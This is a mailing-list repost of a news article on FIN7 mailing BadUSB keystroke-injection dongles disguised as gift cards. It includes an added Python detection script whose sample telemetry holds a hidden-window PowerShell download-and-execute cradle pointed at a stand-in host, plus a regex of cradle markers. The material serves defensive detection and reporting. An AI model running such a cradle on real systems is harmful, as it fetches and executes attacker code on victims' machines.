[BreachExchange] Cybercriminal group mails malicious USB dongles to targeted companies

Destry Winant destry at riskbasedsecurity.com
Wed Apr 1 10:21:34 EDT 2020


Security researchers have come across an attack in which a USB dongle
designed to surreptitiously behave like a keyboard was mailed to a
company under the guise of a Best Buy gift card. This technique has
been used by security professionals during physical penetration
testing engagements in the past, but it has very rarely been observed
in the wild. This time, a known and sophisticated cybercriminal group
is likely behind it.

The attack was analyzed and disclosed by security researchers from
Trustwave SpiderLabs, who learned about it from a business associate
of one of their team members. Ziv Mador, vice president of security
research at Trustwave SpiderLabs, tells CSO that a US company in the
hospitality sector received the USB device sometime in mid-February.

The package contained an official-looking letter with Best Buy's logo
and other branding elements informing the recipient that they had
received a $50 gift card for being a regular customer. "You can spend
it on any product from the list of items presented on a USB stick,"
the letter read. Fortunately, the USB dongle was never inserted into
any computer and was passed along for analysis, because the person
who received it had security training.

The BadUSB

Researchers traced the USB dongle model to a Taiwanese website where
it is sold for the equivalent of $7 under the name BadUSB
Leonardo USB ATMEGA32U4. In 2014, at the Black Hat USA security
conference, a team of researchers from Berlin-based Security Research
Labs (SRLabs) demonstrated that the firmware of many USB devices can
be reprogrammed so that, when inserted into a computer, the device
reports that it is a keyboard and starts sending keystrokes that can
be used to deploy malware. The researchers dubbed this attack BadUSB;
it is different from simply putting malware on a USB stick and relying
on the user to open it, because the operating system trusts keyboard
input without any user interaction.

The Leonardo USB device that Trustwave received and analyzed has an
ATmega32U4 microcontroller inside (the chip used on the Arduino
Leonardo), programmed to act as a virtual keyboard and type out a
command line that executes an obfuscated PowerShell script. The
script reaches out to a domain set up by the attackers and downloads
a second-stage PowerShell payload, which in turn deploys a third,
JavaScript-based payload that is executed through the built-in
Windows Script Host.

This third JavaScript payload generates a unique identifier for the
computer and registers it with a remote command-and-control server. It
then receives additional obfuscated JavaScript code from the server,
which it executes. The goal of this fourth payload is to gather
information about the system: the user's privilege level, the domain
name, time zone, language, OS and hardware information, a list of
running processes, whether Microsoft Office and Adobe Acrobat are
installed, and more.

After this intelligence-gathering routine, the JavaScript backdoor
enters a loop that periodically checks in with the server to see if
there are new commands to execute.
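The chain just described (new keyboard-class device appears, a shell is
launched, PowerShell pulls a second stage, Windows Script Host runs the
JavaScript) leaves a recognisable trail in endpoint telemetry. The
following is an added detection example written for this page; it is not
code from the article, Trustwave or FireEye. It assumes process-creation
records shaped roughly like Sysmon Event ID 1 (image, parent image,
command line, pid/ppid, timestamp) plus a device-arrival record for a
keyboard-class device; the field names, the sample events and the VID/PID
in them are constructed for illustration, not taken from the real samples.

```python
"""Correlate a new keyboard-class device with the cmd -> powershell -> wscript chain.

Added example (not the article's, Trustwave's or FireEye's code). Telemetry
shape, field names, VID/PID and timestamps below are constructed.
"""
import re
from datetime import datetime, timedelta

# Constructed sample telemetry, not real logs. Arduino-style VID/PID shown
# only as an illustration; clones ship with arbitrary IDs, so the rules
# below never key on the ID, only on the device class and the process chain.
SAMPLE_EVENTS = [
    {"time": "2020-02-14T10:02:03", "type": "device_arrival",
     "device_class": "Keyboard", "device_id": r"USB\VID_2341&PID_8036"},
    {"time": "2020-02-14T10:02:05", "type": "process_create", "pid": 4100, "ppid": 2600,
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe"},
    {"time": "2020-02-14T10:02:06", "type": "process_create", "pid": 4112, "ppid": 4100,
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -w hidden -nop -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://c2.invalid/s2')\""},
    {"time": "2020-02-14T10:02:09", "type": "process_create", "pid": 4130, "ppid": 4112,
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r"wscript.exe //E:jscript C:\Users\Public\s3.js"},
    # Benign noise: an admin runs a cmdlet from an existing console, no cradle.
    {"time": "2020-02-14T11:15:00", "type": "process_create", "pid": 5200, "ppid": 3300,
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell Get-Service"},
]

# Download-cradle and hidden-window markers that keystroke injectors tend to type.
CRADLE = re.compile(
    r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b"
    r"|invoke-expression|\biex\b|-e(nc|ncodedcommand)?\b|-w(indowstyle)?\s+hidden",
    re.IGNORECASE,
)
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SHELLS = {"cmd.exe"} | POWERSHELL
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def lineage(by_pid, pid):
    """Walk ppid links upward; returns [child, parent, grandparent, ...] events."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events, hid_window=timedelta(seconds=15)):
    """Return (rule, time) findings, in event order.

    ps_cradle:       PowerShell child of cmd.exe carrying a download cradle
    script_host:     wscript/cscript spawned by PowerShell (stage 3 of the chain)
    shell_after_hid: a shell launched from explorer.exe (Win+R style) within
                     hid_window of a new keyboard-class device appearing
    hid_chain:       script host whose ancestry is powershell <- cmd, where that
                     cmd itself started within hid_window of the new keyboard
    """
    events = sorted(events, key=lambda e: e["time"])
    by_pid = {e["pid"]: e for e in events if e["type"] == "process_create"}
    findings, last_kbd = [], None

    def soon_after_keyboard(ts):
        if last_kbd is None:
            return False
        delta = datetime.fromisoformat(ts) - last_kbd
        return timedelta(0) <= delta <= hid_window

    for e in events:
        if e["type"] == "device_arrival":
            if e.get("device_class") == "Keyboard":
                last_kbd = datetime.fromisoformat(e["time"])
            continue
        if e["type"] != "process_create":
            continue
        img, parent = basename(e["image"]), basename(e["parent_image"])
        if img in POWERSHELL and parent == "cmd.exe" and CRADLE.search(e["command_line"]):
            findings.append(("ps_cradle", e["time"]))
        if img in SCRIPT_HOSTS and parent in POWERSHELL:
            findings.append(("script_host", e["time"]))
        if img in SHELLS and parent == "explorer.exe" and soon_after_keyboard(e["time"]):
            findings.append(("shell_after_hid", e["time"]))
        if img in SCRIPT_HOSTS:
            chain = lineage(by_pid, e["pid"])
            names = [basename(p["image"]) for p in chain]
            if (len(names) >= 3 and names[1] in POWERSHELL and names[2] == "cmd.exe"
                    and soon_after_keyboard(chain[2]["time"])):
                findings.append(("hid_chain", e["time"]))
    return findings


if __name__ == "__main__":
    for rule, when in detect(SAMPLE_EVENTS):
        print(f"{when}  {rule}")
```

The high-confidence signal is the combined `hid_chain` rule: a script host whose
ancestry runs back through PowerShell to a cmd.exe that appeared seconds after a
new keyboard enumerated. A human plugging in a keyboard and then typing a
download cradle within a few seconds is rare; a keystroke injector does exactly
that. The window is a tuning knob: the Leonardo firmware can sleep before typing,
so a short window trades false negatives for fewer false positives. Note that the
device-arrival rule does nothing for a BadUSB device that presents as something
other than a keyboard, and that launches via the Start menu or Win+X may have a
different parent than explorer.exe, so the process-chain rules should stand on
their own.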

"The fact that they are also cheap and readily available to anyone
meant that it was just a matter of time to see this technique used by
criminals in the wild," the Trustwave researchers said in their
report. "Since USB devices are ubiquitous, used and seen everywhere,
some consider them innocuous and safe. Others can be very curious
about the contents of an unknown USB device. If this story teaches us
anything, it's that one should never trust such a device."

FIN7 connection

Mador tells CSO that his team didn't know who the attackers were, but
after seeing the information in Trustwave's report, security
researchers Costin Raiu from Kaspersky Lab and Michael Yip commented
on Twitter that the malware and infrastructure match those used by
the FIN7 gang.

FIN7, also known as Carbanak, is a financially motivated cybercriminal
group that has been targeting US-based companies in the retail,
restaurant and hospitality sectors since around 2015. The group is
known for using sophisticated techniques to move laterally inside
networks and compromise systems with the goal of stealing payment
card information. Researchers from security firm Morphisec have
estimated in the past that FIN7 members earn around $50 million a
month from their activities.

The target in the BadUSB attack was a company in the US hospitality
sector, which is in line with FIN7's previous targeting, but while the
malware (GRIFFON) and infrastructure match FIN7, Raiu tells CSO that
this is the first time he has seen the group use this physical,
USB-dongle-based attack vector.

"We expect that this campaign dates back to at least December 2019,
based on submissions we observed in VirusTotal," Barry Vengerik,
technical director of Technical Operations and Reverse Engineering
(TORE) at FireEye, tells CSO. "FireEye Intelligence has been tracking
FIN7 sending US-based organizations packages via USPS that contained
USB devices configured to deliver malware. When the USB device is
connected to a PC, it functions as a virtual keyboard, launching an
instance of cmd.exe and executing a PowerShell command crafted to
download a remotely hosted PowerShell script designed to launch an
instance of the GRIFFON backdoor."

The FBI also sent a private alert to companies on Thursday confirming
that FIN7 is behind these physical USB-based attacks. The agency said
it received reports of several packages that contained items including
malicious USB devices that were sent to businesses from the retail,
restaurant and hotel industries via USPS. The alert contains more
technical details, pictures of the packages and USB devices, as well
as recommendations to businesses on what information to report back to
the FBI in case they're targeted.

More BadUSB attacks on the way?

Attacks involving USB dongles reprogrammed to act as keyboards have
not been used widely until now because they don't scale well. One
such dongle that's popular with penetration testers is the USB Rubber
Ducky. It's made by a company called Hak5 and costs $50, which is not
a lot of money for a professional to spend, but adds up quickly if
you're an attacker who wants to infect many victims, especially since
the success rate won't be 100 percent.

However, at $7 apiece (and probably less if bought in large
quantities), malicious dongles like the BadUSB Leonardo device make
real-world BadUSB attacks much more viable. Attackers don't even have
to put in much effort, such as creating custom firmware to convert
off-the-shelf, non-malicious USB sticks into malicious ones. They just
need to load their custom payload into a ready-made device and mail

Even so, attacks of this type are expected to target a relatively
small number of carefully selected companies that the attackers have
already researched. According to Trustwave's Mador, the choice of
impersonating Best Buy might not have been an accident: attackers can
use publicly available information to find a company's contractors
and suppliers, and then pose as one of them.

Also, in this case, the rogue letter was sent to the business's
address, but with senior and other key employees now working from home
due to the COVID-19 pandemic, the risk is even higher.

At work, such letters would probably be received by administrative
staff, who might then take the device to the IT or security team if
they've been trained properly, so several people might look at the
device before it is used, Mador says. However, at home there is no
security staff, and even if the intended recipient received security
awareness training at work, the device might be found and used by one
of their family members before they have a chance to stop it.

If hackers compromise a device on the victim's home network, they can
work from there toward the victim's work computer as well, which will
probably give them access to the company's network or systems via a
VPN connection. That's why security professionals are concerned about
the forced work-from-home situation that's currently in effect.

"People know by now that they shouldn't click on links or open
attachments from unknown or untrusted sources," Mador says. "But when
it comes to USB dongles, many still don't use the right judgement."

More information about the BreachExchange mailing list